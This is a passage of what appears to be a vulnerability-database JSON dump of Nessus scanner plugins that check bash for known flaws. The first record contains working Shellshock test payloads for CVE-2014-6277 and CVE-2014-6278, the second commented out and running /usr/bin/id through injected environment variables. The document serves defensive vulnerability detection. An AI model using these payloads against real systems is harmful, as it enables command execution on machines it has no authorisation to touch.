CVE-2014-6277 PoC produces a segfault.\n\ncommand = 'E=\"() { x() { _; }; x() { _; } <<A; }\"' + ' bash -c E';\noutput = ssh_cmd(cmd:command, noexec:TRUE);\n\nif( \"egmentation fault\" >< output\n || \"egmentation Fault\" >< output) # Solaris\n{\n if(info_t == INFO_SSH) ssh_close_connection();\n report_and_exit(port:port, command: command, output: output);\n}\n\n# Problem reported on AIX 6.1 TL 8 SP 1 with bash 4.3.7 (redmine 10989)\n# Disable CVE-2014-6278 check for now\n\n# CVE-2014-6277 detection fails, try to detect CVE-2014-6278,\n# This CVE appears to work against bash 4.2 and 4.3.,\n# but not against 4.1 or below.\n#\n#test_command = \"echo Plugin output: $((1+1))\";\n#command = \"E='() { _; } >_[$($())] { \" + test_command + \"; }' bash -c E\";\n#output = ssh_cmd(cmd:command);\n\n#if (\"Plugin output: 2\" >< output) vuln_6278 = TRUE;\n\n# ok we detected CVE-2014-6278, send another command\n# hoping to get a more convincing output\n#if(vuln_6278)\n#{\n# test_command = \"/usr/bin/id\";\n# command2 = \"E='() { _; } >_[$($())] { \" + test_command + \"; }' bash -c E\";\n# output2 = ssh_cmd(cmd:command2);\n# if (output2 =~ \"uid=[0-9]+.*gid=[0-9]+.*\")\n# {\n# command = command2;\n# output = output2;\n# }\n# report_and_exit(port:port, command:command, output:output);\n#}\n\n# If we still cannot detect CVE-2014-6277 or CVE-2014-6278,\n# we try to determine if the patch for these CVEs has been applied.\ncommand = \"E='() { echo not patched; }' bash -c E\";\noutput = ssh_cmd(cmd:command);\nif(info_t == INFO_SSH) ssh_close_connection();\n\n# Patch not installed\n# Ignore cases where the host returns an \"unknown command\" error and returns the entire command\nif ((\"not patched\" >< output) && (\"echo not patched\" >!< output))\n report_and_exit(port:port, command:command, output:output, patch_check:TRUE);\n# Patch installed\nelse audit(AUDIT_HOST_NOT, \"affected.\");\n\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T16:00:59", "description": "According to the versions of the bash package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.\n (CVE-2016-9401)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-08T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : bash (EulerOS-SA-2017-1163)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:bash", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1163.NASL", "href": "https://www.tenable.com/plugins/nessus/103001", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103001);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-0634\",\n \"CVE-2016-9401\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : bash (EulerOS-SA-2017-1163)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the bash package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - An arbitrary command injection flaw was found in the\n way bash processed the hostname value. A malicious DHCP\n server could use this flaw to execute arbitrary\n commands on the DHCP client machines running bash under\n specific circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the\n way bash processed the SHELLOPTS and PS4 environment\n variables. A local, authenticated attacker could use\n this flaw to exploit poorly written setuid programs to\n elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash\n handled popd commands. A poorly written shell script\n could cause bash to crash resulting in a local denial\n of service limited to a specific bash session.\n (CVE-2016-9401)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1163\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7849de2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"bash-4.2.46-28\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T16:01:42", "description": "According to the versions of the bash package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.\n (CVE-2016-9401)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-08T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : bash (EulerOS-SA-2017-1164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:bash", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1164.NASL", "href": "https://www.tenable.com/plugins/nessus/103002", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103002);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-0634\",\n \"CVE-2016-9401\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : bash (EulerOS-SA-2017-1164)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the bash package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - An arbitrary command injection flaw was found in the\n way bash processed the hostname value. A malicious DHCP\n server could use this flaw to execute arbitrary\n commands on the DHCP client machines running bash under\n specific circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the\n way bash processed the SHELLOPTS and PS4 environment\n variables. A local, authenticated attacker could use\n this flaw to exploit poorly written setuid programs to\n elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash\n handled popd commands. A poorly written shell script\n could cause bash to crash resulting in a local denial\n of service limited to a specific bash session.\n (CVE-2016-9401)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1164\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a54c2eae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"bash-4.2.46-28\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:59", "description": "Security Fix(es) :\n\n - An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.\n (CVE-2016-9401)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bash on SL7.x x86_64 (20170801)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bash", "p-cpe:/a:fermilab:scientific_linux:bash-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bash-doc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170801_BASH_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/102638", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102638);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n\n script_name(english:\"Scientific Linux Security Update : bash on SL7.x x86_64 (20170801)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - An arbitrary command injection flaw was found in the way\n bash processed the hostname value. A malicious DHCP\n server could use this flaw to execute arbitrary commands\n on the DHCP client machines running bash under specific\n circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the way\n bash processed the SHELLOPTS and PS4 environment\n variables. A local, authenticated attacker could use\n this flaw to exploit poorly written setuid programs to\n elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash\n handled popd commands. A poorly written shell script\n could cause bash to crash resulting in a local denial of\n service limited to a specific bash session.\n (CVE-2016-9401)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1708&L=scientific-linux-errata&F=&S=&P=16992\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?360383cc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bash-4.2.46-28.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.46-28.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.46-28.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:29", "description": "An update for bash is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the default shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-25T00:00:00", "type": "nessus", "title": "CentOS 7 : bash (CESA-2017:1931)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2017-1931.NASL", "href": "https://www.tenable.com/plugins/nessus/102744", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1931 and \n# CentOS Errata and Security Advisory 2017:1931 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102744);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"RHSA\", value:\"2017:1931\");\n\n script_name(english:\"CentOS 7 : bash (CESA-2017:1931)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bash is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the\ndefault shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2017-August/004011.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0850f672\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7543\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.46-28.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.46-28.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:17", "description": "An update for bash is now available for Red 